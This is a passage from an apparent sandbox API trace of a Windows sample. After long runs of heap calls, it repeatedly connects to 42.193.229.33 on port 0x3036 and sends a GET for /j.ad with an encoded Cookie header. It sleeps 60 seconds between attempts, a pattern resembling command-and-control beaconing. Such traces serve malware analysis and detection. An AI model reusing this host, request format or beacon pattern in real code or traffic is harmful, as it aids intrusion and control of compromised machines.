hHeap=0x1f50000) returned 1 [0089.215] RtlAllocateHeap (HeapHandle=0x1f50000, Flags=0x0, Size=0x80) returned 0x1f57830 [0089.215] HeapFree (in: hHeap=0x1f50000, dwFlags=0x0, lpMem=0x1f57830 | out: hHeap=0x1f50000) returned 1 [0089.215] RtlAllocateHeap (HeapHandle=0x1f50000, Flags=0x0, Size=0x80) returned 0x1f57830 [0089.215] HeapFree (in: hHeap=0x1f50000, dwFlags=0x0, lpMem=0x1f57830 | out: hHeap=0x1f50000) returned 1 [0089.215] RtlAllocateHeap (HeapHandle=0x1f50000, Flags=0x0, Size=0x80) returned 0x1f57830 [0089.216] HeapFree (in: hHeap=0x1f50000, dwFlags=0x0, lpMem=0x1f57830 | out: hHeap=0x1f50000) returned 1 [0089.216] RtlAllocateHeap (HeapHandle=0x1f50000, Flags=0x0, Size=0x80) returned 0x1f57830 [0089.216] HeapFree (in: hHeap=0x1f50000, dwFlags=0x0, lpMem=0x1f57830 | out: hHeap=0x1f50000) returned 1 [0089.216] RtlAllocateHeap (HeapHandle=0x1f50000, Flags=0x0, Size=0x80) returned 0x1f57830 [0089.216] HeapFree (in: hHeap=0x1f50000, dwFlags=0x0, lpMem=0x1f57830 | out: hHeap=0x1f50000) returned 1 [0089.216] RtlAllocateHeap (HeapHandle=0x1f50000, Flags=0x0, Size=0x80) returned 0x1f57830 [0089.216] HeapFree (in: hHeap=0x1f50000, dwFlags=0x0, lpMem=0x1f57830 | out: hHeap=0x1f50000) returned 1 [0089.216] RtlAllocateHeap (HeapHandle=0x1f50000, Flags=0x0, Size=0x80) returned 0x1f57830 [0089.217] HeapFree (in: hHeap=0x1f50000, dwFlags=0x0, lpMem=0x1f57830 | out: hHeap=0x1f50000) returned 1 [0089.217] RtlAllocateHeap (HeapHandle=0x1f50000, Flags=0x0, Size=0x80) returned 0x1f57830 [0089.217] HeapFree (in: hHeap=0x1f50000, dwFlags=0x0, lpMem=0x1f57830 | out: hHeap=0x1f50000) returned 1 [0089.217] RtlAllocateHeap (HeapHandle=0x1f50000, Flags=0x0, Size=0x80) returned 0x1f57830 [0089.217] HeapFree (in: hHeap=0x1f50000, dwFlags=0x0, lpMem=0x1f57830 | out: hHeap=0x1f50000) returned 1 [0089.217] RtlAllocateHeap (HeapHandle=0x1f50000, Flags=0x0, Size=0x80) returned 0x1f57830 [0089.218] HeapFree (in: hHeap=0x1f50000, dwFlags=0x0, lpMem=0x1f57830 | out: hHeap=0x1f50000) returned 1 [0089.218] RtlAllocateHeap (HeapHandle=0x1f50000, Flags=0x0, Size=0x80) returned 0x1f57830 [0089.218] HeapFree (in: hHeap=0x1f50000, dwFlags=0x0, lpMem=0x1f57830 | out: hHeap=0x1f50000) returned 1 [0089.218] RtlAllocateHeap (HeapHandle=0x1f50000, Flags=0x0, Size=0x80) returned 0x1f57830 [0089.218] HeapFree (in: hHeap=0x1f50000, dwFlags=0x0, lpMem=0x1f57830 | out: hHeap=0x1f50000) returned 1 [0089.218] RtlAllocateHeap (HeapHandle=0x1f50000, Flags=0x0, Size=0x80) returned 0x1f57830 [0089.218] HeapFree (in: hHeap=0x1f50000, dwFlags=0x0, lpMem=0x1f57830 | out: hHeap=0x1f50000) returned 1 [0089.218] RtlAllocateHeap (HeapHandle=0x1f50000, Flags=0x0, Size=0x80) returned 0x1f57830 [0089.219] HeapFree (in: hHeap=0x1f50000, dwFlags=0x0, lpMem=0x1f57830 | out: hHeap=0x1f50000) returned 1 [0089.219] RtlAllocateHeap (HeapHandle=0x1f50000, Flags=0x0, Size=0x80) returned 0x1f57830 [0089.219] HeapFree (in: hHeap=0x1f50000, dwFlags=0x0, lpMem=0x1f57830 | out: hHeap=0x1f50000) returned 1 [0089.219] RtlAllocateHeap (HeapHandle=0x1f50000, Flags=0x0, Size=0x80) returned 0x1f57830 [0089.219] HeapFree (in: hHeap=0x1f50000, dwFlags=0x0, lpMem=0x1f57830 | out: hHeap=0x1f50000) returned 1 [0089.219] RtlAllocateHeap (HeapHandle=0x1f50000, Flags=0x0, Size=0x80) returned 0x1f57830 [0089.219] HeapFree (in: hHeap=0x1f50000, dwFlags=0x0, lpMem=0x1f57830 | out: hHeap=0x1f50000) returned 1 [0089.220] RtlAllocateHeap (HeapHandle=0x1f50000, Flags=0x0, Size=0x80) returned 0x1f57830 [0089.220] HeapFree (in: hHeap=0x1f50000, dwFlags=0x0, lpMem=0x1f57830 | out: hHeap=0x1f50000) returned 1 [0089.220] RtlAllocateHeap (HeapHandle=0x1f50000, Flags=0x0, Size=0x80) returned 0x1f57830 [0089.220] HeapFree (in: hHeap=0x1f50000, dwFlags=0x0, lpMem=0x1f57830 | out: hHeap=0x1f50000) returned 1 [0089.220] RtlAllocateHeap (HeapHandle=0x1f50000, Flags=0x0, Size=0x80) returned 0x1f57830 [0089.220] HeapFree (in: hHeap=0x1f50000, dwFlags=0x0, lpMem=0x1f57830 | out: hHeap=0x1f50000) returned 1 [0089.220] RtlAllocateHeap (HeapHandle=0x1f50000, Flags=0x0, Size=0x80) returned 0x1f57830 [0089.221] HeapFree (in: hHeap=0x1f50000, dwFlags=0x0, lpMem=0x1f57830 | out: hHeap=0x1f50000) returned 1 [0089.221] RtlAllocateHeap (HeapHandle=0x1f50000, Flags=0x0, Size=0x80) returned 0x1f57830 [0089.222] HeapFree (in: hHeap=0x1f50000, dwFlags=0x0, lpMem=0x1f57830 | out: hHeap=0x1f50000) returned 1 [0089.222] RtlAllocateHeap (HeapHandle=0x1f50000, Flags=0x0, Size=0x80) returned 0x1f57830 [0089.222] HeapFree (in: hHeap=0x1f50000, dwFlags=0x0, lpMem=0x1f57830 | out: hHeap=0x1f50000) returned 1 [0089.222] RtlAllocateHeap (HeapHandle=0x1f50000, Flags=0x0, Size=0x80) returned 0x1f57830 [0089.223] HeapFree (in: hHeap=0x1f50000, dwFlags=0x0, lpMem=0x1f57830 | out: hHeap=0x1f50000) returned 1 [0089.223] RtlAllocateHeap (HeapHandle=0x1f50000, Flags=0x0, Size=0x80) returned 0x1f57830 [0089.223] HeapFree (in: hHeap=0x1f50000, dwFlags=0x0, lpMem=0x1f57830 | out: hHeap=0x1f50000) returned 1 [0089.223] RtlAllocateHeap (HeapHandle=0x1f50000, Flags=0x0, Size=0x80) returned 0x1f57830 [0089.224] HeapFree (in: hHeap=0x1f50000, dwFlags=0x0, lpMem=0x1f57830 | out: hHeap=0x1f50000) returned 1 [0089.224] RtlAllocateHeap (HeapHandle=0x1f50000, Flags=0x0, Size=0x80) returned 0x1f57830 [0089.224] HeapFree (in: hHeap=0x1f50000, dwFlags=0x0, lpMem=0x1f57830 | out: hHeap=0x1f50000) returned 1 [0089.224] RtlAllocateHeap (HeapHandle=0x1f50000, Flags=0x0, Size=0x80) returned 0x1f57830 [0089.224] HeapFree (in: hHeap=0x1f50000, dwFlags=0x0, lpMem=0x1f57830 | out: hHeap=0x1f50000) returned 1 [0089.224] RtlAllocateHeap (HeapHandle=0x1f50000, Flags=0x0, Size=0x80) returned 0x1f57830 [0089.225] HeapFree (in: hHeap=0x1f50000, dwFlags=0x0, lpMem=0x1f57830 | out: hHeap=0x1f50000) returned 1 [0089.225] RtlAllocateHeap (HeapHandle=0x1f50000, Flags=0x0, Size=0x80) returned 0x1f57830 [0089.225] HeapFree (in: hHeap=0x1f50000, dwFlags=0x0, lpMem=0x1f57830 | out: hHeap=0x1f50000) returned 1 [0089.225] RtlAllocateHeap (HeapHandle=0x1f50000, Flags=0x0, Size=0x80) returned 0x1f57830 [0089.225] HeapFree (in: hHeap=0x1f50000, dwFlags=0x0, lpMem=0x1f57830 | out: hHeap=0x1f50000) returned 1 [0089.225] RtlAllocateHeap (HeapHandle=0x1f50000, Flags=0x0, Size=0x80) returned 0x1f57830 [0089.226] HeapFree (in: hHeap=0x1f50000, dwFlags=0x0, lpMem=0x1f57830 | out: hHeap=0x1f50000) returned 1 [0089.226] RtlAllocateHeap (HeapHandle=0x1f50000, Flags=0x0, Size=0x80) returned 0x1f57830 [0089.226] HeapFree (in: hHeap=0x1f50000, dwFlags=0x0, lpMem=0x1f57830 | out: hHeap=0x1f50000) returned 1 [0089.226] RtlAllocateHeap (HeapHandle=0x1f50000, Flags=0x0, Size=0x80) returned 0x1f57830 [0089.226] HeapFree (in: hHeap=0x1f50000, dwFlags=0x0, lpMem=0x1f57830 | out: hHeap=0x1f50000) returned 1 [0089.226] RtlAllocateHeap (HeapHandle=0x1f50000, Flags=0x0, Size=0x80) returned 0x1f57830 [0089.226] HeapFree (in: hHeap=0x1f50000, dwFlags=0x0, lpMem=0x1f57830 | out: hHeap=0x1f50000) returned 1 [0089.226] RtlAllocateHeap (HeapHandle=0x1f50000, Flags=0x0, Size=0x80) returned 0x1f57830 [0089.227] HeapFree (in: hHeap=0x1f50000, dwFlags=0x0, lpMem=0x1f57830 | out: hHeap=0x1f50000) returned 1 [0089.227] RtlAllocateHeap (HeapHandle=0x1f50000, Flags=0x0, Size=0x80) returned 0x1f57830 [0089.227] HeapFree (in: hHeap=0x1f50000, dwFlags=0x0, lpMem=0x1f57830 | out: hHeap=0x1f50000) returned 1 [0089.227] RtlAllocateHeap (HeapHandle=0x1f50000, Flags=0x0, Size=0x80) returned 0x1f57830 [0089.227] HeapFree (in: hHeap=0x1f50000, dwFlags=0x0, lpMem=0x1f57830 | out: hHeap=0x1f50000) returned 1 [0089.227] HeapFree (in: hHeap=0x1f50000, dwFlags=0x0, lpMem=0x1f5c558 | out: hHeap=0x1f50000) returned 1 [0089.228] HeapFree (in: hHeap=0x1f50000, dwFlags=0x0, lpMem=0x1f5c900 | out: hHeap=0x1f50000) returned 1 [0089.228] HeapFree (in: hHeap=0x1f50000, dwFlags=0x0, lpMem=0x1f53640 | out: hHeap=0x1f50000) returned 1 [0089.228] HeapFree (in: hHeap=0x1f50000, dwFlags=0x0, lpMem=0x1f5bc48 | out: hHeap=0x1f50000) returned 1 [0089.228] HeapFree (in: hHeap=0x1f50000, dwFlags=0x0, lpMem=0x1f53658 | out: hHeap=0x1f50000) returned 1 [0089.228] HeapFree (in: hHeap=0x1f50000, dwFlags=0x0, lpMem=0x1f5c4d0 | out: hHeap=0x1f50000) returned 1 [0089.228] HeapFree (in: hHeap=0x1f50000, dwFlags=0x0, lpMem=0x1f5bce8 | out: hHeap=0x1f50000) returned 1 [0089.228] RtlAllocateHeap (HeapHandle=0x1f50000, Flags=0x0, Size=0x14) returned 0x1f53640 [0089.228] GetLastError () returned 0x0 [0089.228] SetLastError (dwErrCode=0x0) [0089.228] GetLastError () returned 0x0 [0089.228] SetLastError (dwErrCode=0x0) [0089.228] GetLastError () returned 0x0 [0089.229] SetLastError (dwErrCode=0x0) [0089.229] GetLastError () returned 0x0 [0089.229] SetLastError (dwErrCode=0x0) [0089.229] GetLastError () returned 0x0 [0089.229] SetLastError (dwErrCode=0x0) [0089.229] InternetOpenA (lpszAgent="Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)", dwAccessType=0x0, lpszProxy=0x0, lpszProxyBypass=0x0, dwFlags=0x0) returned 0xcc0004 [0089.484] InternetSetOptionA (hInternet=0xcc0004, dwOption=0x5, lpBuffer=0x2ef860*, dwBufferLength=0x4) returned 1 [0089.484] InternetSetOptionA (hInternet=0xcc0004, dwOption=0x6, lpBuffer=0x2ef860*, dwBufferLength=0x4) returned 1 [0089.484] InternetConnectA (hInternet=0xcc0004, lpszServerName="42.193.229.33", nServerPort=0x3036, lpszUserName=0x0, lpszPassword=0x0, dwService=0x3, dwFlags=0x0, dwContext=0x1e2c58) returned 0xcc0008 [0089.485] RtlAllocateHeap (HeapHandle=0x1f50000, Flags=0x0, Size=0x10) returned 0x1f5bce8 [0089.485] RtlAllocateHeap (HeapHandle=0x1f50000, Flags=0x0, Size=0x6c00) returned 0x2576b90 [0089.485] GetLastError () returned 0x0 [0089.486] SetLastError (dwErrCode=0x0) [0089.490] htonl (hostlong=0x7000000) returned 0x7 [0089.490] htonl (hostlong=0x0) returned 0x0 [0089.490] htonl (hostlong=0x3000000) returned 0x3 [0089.490] htonl (hostlong=0x6000000) returned 0x6 [0089.490] htonl (hostlong=0x6000000) returned 0x6 [0089.490] GetLastError () returned 0x0 [0089.490] SetLastError (dwErrCode=0x0) [0089.490] htonl (hostlong=0x0) returned 0x0 [0089.490] GetLastError () returned 0x0 [0089.490] SetLastError (dwErrCode=0x0) [0089.490] HttpOpenRequestA (hConnect=0xcc0008, lpszVerb="GET", lpszObjectName="/j.ad", lpszVersion=0x0, lpszReferrer=0x0, lplpszAcceptTypes=0x2ef328*="*/*", dwFlags=0x84480200, dwContext=0x1e2c58) returned 0xcc000c [0089.494] HttpSendRequestA (hRequest=0xcc000c, lpszHeaders="Cookie: FWZqwaMnmmxHF39MBlhtJf8lOfw+/ioROYOV6abi6mzy1vS/oPJEW8F5so4oCzhLQrsCJAU8dmR/aP8X3eABV+lQUDV9mT9mWZjh0w84NbsnF4EKvIzfYQXqa2A+n18s7B8jZDjK+EpL1xvttfoSNtWVxlO+Xn8E2GK5EYYACTw=\r\n", dwHeadersLength=0xb6, lpOptional=0x2577790*, dwOptionalLength=0x0) returned 0 [0092.167] HeapFree (in: hHeap=0x1f50000, dwFlags=0x0, lpMem=0x2576b90 | out: hHeap=0x1f50000) returned 1 [0092.167] HeapFree (in: hHeap=0x1f50000, dwFlags=0x0, lpMem=0x1f5bce8 | out: hHeap=0x1f50000) returned 1 [0092.167] HttpQueryInfoA (in: hRequest=0xcc000c, dwInfoLevel=0x13, lpBuffer=0x2ef768, lpdwBufferLength=0x2ef354, lpdwIndex=0x0 | out: lpBuffer=0x2ef768*, lpdwBufferLength=0x2ef354*=0x1, lpdwIndex=0x0) returned 1 [0092.167] InternetCloseHandle (hInternet=0xcc000c) returned 1 [0092.167] InternetCloseHandle (hInternet=0xcc0008) returned 1 [0092.167] InternetCloseHandle (hInternet=0xcc0004) returned 1 [0092.168] Sleep (dwMilliseconds=0xea60) [0102.548] GetLastError () returned 0x2efd [0102.548] SetLastError (dwErrCode=0x2efd) [0102.553] HeapFree (in: hHeap=0x1f50000, dwFlags=0x0, lpMem=0x1f53640 | out: hHeap=0x1f50000) returned 1 [0102.553] RtlAllocateHeap (HeapHandle=0x1f50000, Flags=0x0, Size=0x14) returned 0x1f53640 [0102.553] GetLastError () returned 0x2efd [0102.553] SetLastError (dwErrCode=0x2efd) [0102.554] GetLastError () returned 0x2efd [0102.554] SetLastError (dwErrCode=0x2efd) [0102.554] GetLastError () returned 0x2efd [0102.554] SetLastError (dwErrCode=0x2efd) [0102.554] GetLastError () returned 0x2efd [0102.554] SetLastError (dwErrCode=0x2efd) [0102.554] GetLastError () returned 0x2efd [0102.554] SetLastError (dwErrCode=0x2efd) [0102.556] InternetOpenA (lpszAgent="Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)", dwAccessType=0x0, lpszProxy=0x0, lpszProxyBypass=0x0, dwFlags=0x0) returned 0xcc0004 [0102.558] InternetSetOptionA (hInternet=0xcc0004, dwOption=0x5, lpBuffer=0x2ef860*, dwBufferLength=0x4) returned 1 [0102.558] InternetSetOptionA (hInternet=0xcc0004, dwOption=0x6, lpBuffer=0x2ef860*, dwBufferLength=0x4) returned 1 [0102.558] InternetConnectA (hInternet=0xcc0004, lpszServerName="42.193.229.33", nServerPort=0x3036, lpszUserName=0x0, lpszPassword=0x0, dwService=0x3, dwFlags=0x0, dwContext=0x1e2c58) returned 0xcc0008 [0102.563] RtlAllocateHeap (HeapHandle=0x1f50000, Flags=0x0, Size=0x10) returned 0x1f5bce8 [0102.563] RtlAllocateHeap (HeapHandle=0x1f50000, Flags=0x0, Size=0x6c00) returned 0x2576b90 [0102.563] GetLastError () returned 0x0 [0102.563] SetLastError (dwErrCode=0x0) [0102.565] htonl (hostlong=0x7000000) returned 0x7 [0102.565] htonl (hostlong=0x0) returned 0x0 [0102.566] htonl (hostlong=0x3000000) returned 0x3 [0102.566] htonl (hostlong=0x6000000) returned 0x6 [0102.567] htonl (hostlong=0x6000000) returned 0x6 [0102.567] GetLastError () returned 0x0 [0102.567] SetLastError (dwErrCode=0x0) [0102.568] htonl (hostlong=0x0) returned 0x0 [0102.568] GetLastError () returned 0x0 [0102.568] SetLastError (dwErrCode=0x0) [0102.568] HttpOpenRequestA (hConnect=0xcc0008, lpszVerb="GET", lpszObjectName="/j.ad", lpszVersion=0x0, lpszReferrer=0x0, lplpszAcceptTypes=0x2ef328*="*/*", dwFlags=0x84480200, dwContext=0x1e2c58) returned 0xcc000c [0102.569] HttpSendRequestA (hRequest=0xcc000c, lpszHeaders="Cookie: FWZqwaMnmmxHF39MBlhtJf8lOfw+/ioROYOV6abi6mzy1vS/oPJEW8F5so4oCzhLQrsCJAU8dmR/aP8X3eABV+lQUDV9mT9mWZjh0w84NbsnF4EKvIzfYQXqa2A+n18s7B8jZDjK+EpL1xvttfoSNtWVxlO+Xn8E2GK5EYYACTw=\r\n", dwHeadersLength=0xb6, lpOptional=0x2577790*, dwOptionalLength=0x0) returned 0 [0104.533] HeapFree (in: hHeap=0x1f50000, dwFlags=0x0, lpMem=0x2576b90 | out: hHeap=0x1f50000) returned 1 [0104.533] HeapFree (in: hHeap=0x1f50000, dwFlags=0x0, lpMem=0x1f5bce8 | out: hHeap=0x1f50000) returned 1 [0104.533] HttpQueryInfoA (in: hRequest=0xcc000c, dwInfoLevel=0x13, lpBuffer=0x2ef768, lpdwBufferLength=0x2ef354, lpdwIndex=0x0 | out: lpBuffer=0x2ef768*, lpdwBufferLength=0x2ef354*=0x1, lpdwIndex=0x0) returned 1 [0104.535] InternetCloseHandle (hInternet=0xcc000c) returned 1 [0104.535] InternetCloseHandle (hInternet=0xcc0008) returned 1 [0104.535] InternetCloseHandle (hInternet=0xcc0004) returned 1 [0104.535] Sleep (dwMilliseconds=0xea60) [0114.653] GetLastError () returned 0x2efd [0114.653] SetLastError (dwErrCode=0x2efd) [0114.655] HeapFree (in: hHeap=0x1f50000, dwFlags=0x0, lpMem=0x1f53640 | out: hHeap=0x1f50000) returned 1 [0114.655] RtlAllocateHeap (HeapHandle=0x1f50000, Flags=0x0, Size=0x14) returned 0x1f53640 [0114.655] GetLastError () returned 0x2efd [0114.656] SetLastError (dwErrCode=0x2efd) [0114.657] GetLastError () returned 0x2efd [0114.657] SetLastError (dwErrCode=0x2efd) [0114.657] GetLastError () returned 0x2efd [0114.657] SetLastError (dwErrCode=0x2efd) [0114.657] GetLastError () returned 0x2efd [0114.658] SetLastError (dwErrCode=0x2efd) [0114.658] GetLastError () returned 0x2efd [0114.658] SetLastError (dwErrCode=0x2efd) [0114.659] InternetOpenA (lpszAgent="Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)", dwAccessType=0x0, lpszProxy=0x0, lpszProxyBypass=0x0, dwFlags=0x0) returned 0xcc0004 [0114.662] InternetSetOptionA (hInternet=0xcc0004, dwOption=0x5, lpBuffer=0x2ef860*, dwBufferLength=0x4) returned 1 [0114.662] InternetSetOptionA (hInternet=0xcc0004, dwOption=0x6, lpBuffer=0x2ef860*, dwBufferLength=0x4) returned 1 [0114.662] InternetConnectA (hInternet=0xcc0004, lpszServerName="42.193.229.33", nServerPort=0x3036, lpszUserName=0x0, lpszPassword=0x0, dwService=0x3, dwFlags=0x0, dwContext=0x1e2c58) returned 0xcc0008 [0114.668] RtlAllocateHeap (HeapHandle=0x1f50000, Flags=0x0, Size=0x10) returned 0x1f5bce8 [0114.668] RtlAllocateHeap (HeapHandle=0x1f50000, Flags=0x0, Size=0x6c00) returned 0x2576b90 [0114.669] GetLastError () returned 0x0 [0114.669] SetLastError (dwErrCode=0x0) [0114.670] htonl (hostlong=0x7000000) returned 0x7 [0114.670] htonl (hostlong=0x0) returned 0x0 [0114.672] htonl (hostlong=0x3000000) returned 0x3 [0114.672] htonl (hostlong=0x6000000) returned 0x6 [0114.672] htonl (hostlong=0x6000000) returned 0x6 [0114.672] GetLastError () returned 0x0 [0114.672] SetLastError (dwErrCode=0x0) [0114.674] htonl (hostlong=0x0) returned 0x0 [0114.674] GetLastError () returned 0x0 [0114.674] SetLastError (dwErrCode=0x0) [0114.674] HttpOpenRequestA (hConnect=0xcc0008, lpszVerb="GET", lpszObjectName="/j.ad", lpszVersion=0x0, lpszReferrer=0x0, lplpszAcceptTypes=0x2ef328*="*/*", dwFlags=0x84480200, dwContext=0x1e2c58) returned 0xcc000c [0114.675] HttpSendRequestA (hRequest=0xcc000c, lpszHeaders="Cookie: FWZqwaMnmmxHF39MBlhtJf8lOfw+/ioROYOV6abi6mzy1vS/oPJEW8F5so4oCzhLQrsCJAU8dmR/aP8X3eABV+lQUDV9mT9mWZjh0w84NbsnF4EKvIzfYQXqa2A+n18s7B8jZDjK+EpL1xvttfoSNtWVxlO+Xn8E2GK5EYYACTw=\r\n", dwHeadersLength=0xb6, lpOptional=0x2577790*, dwOptionalLength=0x0) returned 0 [0116.731] HeapFree (in: hHeap=0x1f50000, dwFlags=0x0, lpMem=0x2576b90 | out: hHeap=0x1f50000) returned 1 [0116.731] HeapFree (in: hHeap=0x1f50000, dwFlags=0x0, lpMem=0x1f5bce8 | out: hHeap=0x1f50000) returned 1 [0116.731] HttpQueryInfoA (in: hRequest=0xcc000c, dwInfoLevel=0x13, lpBuffer=0x2ef768, lpdwBufferLength=0x2ef354, lpdwIndex=0x0 | out: lpBuffer=0x2ef768*, lpdwBufferLength=0x2ef354*=0x1, lpdwIndex=0x0) returned 1 [0116.732] InternetCloseHandle (hInternet=0xcc000c) returned 1 [0116.732] InternetCloseHandle (hInternet=0xcc0008) returned 1 [0116.732] InternetCloseHandle (hInternet=0xcc0004) returned 1 [0116.732] Sleep (dwMilliseconds=0xea60) [0116.749] GetLastError () returned 0x2efd [0116.749] SetLastError (dwErrCode=0x2efd) [0116.749] HeapFree (in: hHeap=0x1f50000, dwFlags=0x0, lpMem=0x1f53640 | out: hHeap=0x1f50000) returned 1 [0116.749] RtlAllocateHeap (HeapHandle=0x1f50000, Flags=0x0, Size=0x14) returned 0x1f53640 [0116.749] GetLastError () returned 0x2efd [0116.749] SetLastError (dwErrCode=0x2efd) [0116.749] GetLastError () returned 0x2efd [0116.749] SetLastError (dwErrCode=0x2efd) [0116.749] GetLastError () returned 0x2efd [0116.749] SetLastError (dwErrCode=0x2efd) [0116.749] GetLastError () returned 0x2efd [0116.750] SetLastError (dwErrCode=0x2efd) [0116.750] GetLastError () returned 0x2efd [0116.750] SetLastError (dwErrCode=0x2efd) [0116.750] InternetOpenA (lpszAgent="Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)", dwAccessType=0x0, lpszProxy=0x0, lpszProxyBypass=0x0, dwFlags=0x0) returned 0xcc0004 [0116.751] InternetSetOptionA (hInternet=0xcc0004, dwOption=0x5, lpBuffer=0x2ef860*, dwBufferLength=0x4) returned 1 [0116.751] InternetSetOptionA (hInternet=0xcc0004, dwOption=0x6, lpBuffer=0x2ef860*, dwBufferLength=0x4) returned 1 [0116.751] InternetConnectA (hInternet=0xcc0004, lpszServerName="42.193.229.33", nServerPort=0x3036, lpszUserName=0x0, lpszPassword=0x0, dwService=0x3, dwFlags=0x0, dwContext=0x1e2c58) returned 0xcc0008 [0116.751] RtlAllocateHeap (HeapHandle=0x1f50000, Flags=0x0, Size=0x10) returned 0x1f5bce8 [0116.751] RtlAllocateHeap (HeapHandle=0x1f50000, Flags=0x0, Size=0x6c00) returned 0x2576b90 [0116.751] GetLastError () returned 0x0 [0116.751] SetLastError (dwErrCode=0x0) [0116.751] htonl (hostlong=0x7000000) returned 0x7 [0116.751] htonl (hostlong=0x0) returned 0x0 [0116.751] htonl (hostlong=0x3000000) returned 0x3 [0116.751] htonl (hostlong=0x6000000) returned 0x6 [0116.751] htonl (hostlong=0x6000000) returned 0x6 [0116.751] GetLastError () returned 0x0 [0116.752] SetLastError (dwErrCode=0x0) [0116.752] htonl (hostlong=0x0) returned 0x0 [0116.752] GetLastError () returned 0x0 [0116.752] SetLastError (dwErrCode=0x0) [0116.752] HttpOpenRequestA (hConnect=0xcc0008, lpszVerb="GET", lpszObjectName="/j.ad", lpszVersion=0x0, lpszReferrer=0x0, lplpszAcceptTypes=0x2ef328*="*/*", dwFlags=0x84480200, dwContext=0x1e2c58) returned 0xcc000c [0116.752] HttpSendRequestA (hRequest=0xcc000c, lpszHeaders="Cookie: FWZqwaMnmmxHF39MBlhtJf8lOfw+/ioROYOV6abi6mzy1vS/oPJEW8F5so4oCzhLQrsCJAU8dmR/aP8X3eABV+lQUDV9mT9mWZjh0w84NbsnF4EKvIzfYQXqa2A+n18s7B8jZDjK+EpL1xvttfoSNtWVxlO+Xn8E2GK5EYYACTw=\r\n", dwHeadersLength=0xb6, lpOptional=0x2577790*, dwOptionalLength=0x0) returned 0 [0118.734] HeapFree (in: hHeap=0x1f50000, dwFlags=0x0, lpMem=0x2576b90 | out: hHeap=0x1f50000) returned 1 [0118.734] HeapFree (in: hHeap=0x1f50000, dwFlags=0x0, lpMem=0x1f5bce8 | out: hHeap=0x1f50000) returned 1 [0118.734] HttpQueryInfoA (in: hRequest=0xcc000c, dwInfoLevel=0x13, lpBuffer=0x2ef768, lpdwBufferLength=0x2ef354, lpdwIndex=0x0 | out: lpBuffer=0x2ef768*, lpdwBufferLength=0x2ef354*=0x1, lpdwIndex=0x0) returned 1 [0118.734] InternetCloseHandle (hInternet=0xcc000c) returned 1 [0118.734] InternetCloseHandle (hInternet=0xcc0008) returned 1 [0118.734] InternetCloseHandle (hInternet=0xcc0004) returned 1 [0118.734] Sleep (dwMilliseconds=0xea60) [0118.739] GetLastError () returned 0x2efd [0118.739] SetLastError (dwErrCode=0x2efd) [0118.739] HeapFree (in: hHeap=0x1f50000, dwFlags=0x0, lpMem=0x1f53640 | out: hHeap=0x1f50000) returned 1 [0118.739] RtlAllocateHeap (HeapHandle=0x1f50000, Flags=0x0, Size=0x14) returned 0x1f53640 [0118.739] GetLastError () returned 0x2efd [0118.739] SetLastError (dwErrCode=0x2efd) [0118.739] GetLastError () returned 0x2efd [0118.739] SetLastError (dwErrCode=0x2efd) [0118.739] GetLastError () returned 0x2efd [0118.739] SetLastError (dwErrCode=0x2efd) [0118.739] GetLastError () returned 0x2efd [0118.739] SetLastError (dwErrCode=0x2efd) [0118.739] GetLastError () returned 0x2efd [0118.739] SetLastError (dwErrCode=0x2efd) [0118.739] InternetOpenA (lpszAgent="Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)", dwAccessType=0x0, lpszProxy=0x0, lpszProxyBypass=0x0, dwFlags=0x0) returned 0xcc0004 [0118.740] InternetSetOptionA (hInternet=0xcc0004, dwOption=0x5, lpBuffer=0x2ef860*, dwBufferLength=0x4) returned 1 [0118.740] InternetSetOptionA (hInternet=0xcc0004, dwOption=0x6, lpBuffer=0x2ef860*, dwBufferLength=0x4) returned 1 [0118.740] InternetConnectA (hInternet=0xcc0004, lpszServerName="42.193.229.33", nServerPort=0x3036, lpszUserName=0x0, lpszPassword=0x0, dwService=0x3, dwFlags=0x0, dwContext=0x1e2c58) returned 0xcc0008 [0118.740] RtlAllocateHeap (HeapHandle=0x1f50000, Flags=0x0, Size=0x10) returned 0x1f5bce8 [0118.740] RtlAllocateHeap (HeapHandle=0x1f50000, Flags=0x0, Size=0x6c00) returned 0x2576b90 [0118.740] GetLastError () returned 0x0 [0118.740] SetLastError (dwErrCode=0x0) [0118.740] htonl (hostlong=0x7000000) returned 0x7 [0118.740] htonl (hostlong=0x0) returned 0x0 [0118.740] htonl (hostlong=0x3000000) returned 0x3 [0118.740] htonl (hostlong=0x6000000) returned 0x6 [0118.740] htonl (hostlong=0x6000000) returned 0x6 [0118.740] GetLastError () returned 0x0 [0118.740] SetLastError (dwErrCode=0x0) [0118.740] htonl (hostlong=0x0) returned 0x0 [0118.740] GetLastError () returned 0x0 [0118.740] SetLastError (dwErrCode=0x0) [0118.740] HttpOpenRequestA (hConnect=0xcc0008, lpszVerb="GET", lpszObjectName="/j.ad", lpszVersion=0x0, lpszReferrer=0x0, lplpszAcceptTypes=0x2ef328*="*/*", dwFlags=0x84480200, dwContext=0x1e2c58) returned 0xcc000c [0118.740] HttpSendRequestA (hRequest=0xcc000c, lpszHeaders="Cookie: FWZqwaMnmmxHF39MBlhtJf8lOfw+/ioROYOV6abi6mzy1vS/oPJEW8F5so4oCzhLQrsCJAU8dmR/aP8X3eABV+lQUDV9mT9mWZjh0w84NbsnF4EKvIzfYQXqa2A+n18s7B8jZDjK+EpL1xvttfoSNtWVxlO+Xn8E2GK5EYYACTw=\r\n", dwHeadersLength=0xb6, lpOptional=0x2577790*, dwOptionalLength=0x0) returned 0 [0120.707] HeapFree (in: hHeap=0x1f50000, dwFlags=0x0, lpMem=0x2576b90 | out: hHeap=0x1f50000) returned 1 [0120.707] HeapFree (in: hHeap=0x1f50000, dwFlags=0x0, lpMem=0x1f5bce8 | out: hHeap=0x1f50000) returned 1 [0120.707] HttpQueryInfoA (in: hRequest=0xcc000c, dwInfoLevel=0x13, lpBuffer=0x2ef768, lpdwBufferLength=0x2ef354, lpdwIndex=0x0 | out: lpBuffer=0x2ef768*, lpdwBufferLength=0x2ef354*=0x1, lpdwIndex=0x0) returned 1 [0120.707] InternetCloseHandle (hInternet=0xcc000c) returned 1 [0120.707] InternetCloseHandle (hInternet=0xcc0008) returned 1 [0120.707] InternetCloseHandle (hInternet=0xcc0004) returned 1 [0120.707] Sleep (dwMilliseconds=0xea60) [0120.719] GetLastError () returned 0x2efd [0120.720] SetLastError (dwErrCode=0x2efd) [0120.720] HeapFree (in: hHeap=0x1f50000, dwFlags=0x0, lpMem=0x1f53640 | out: hHeap=0x1f50000) returned 1 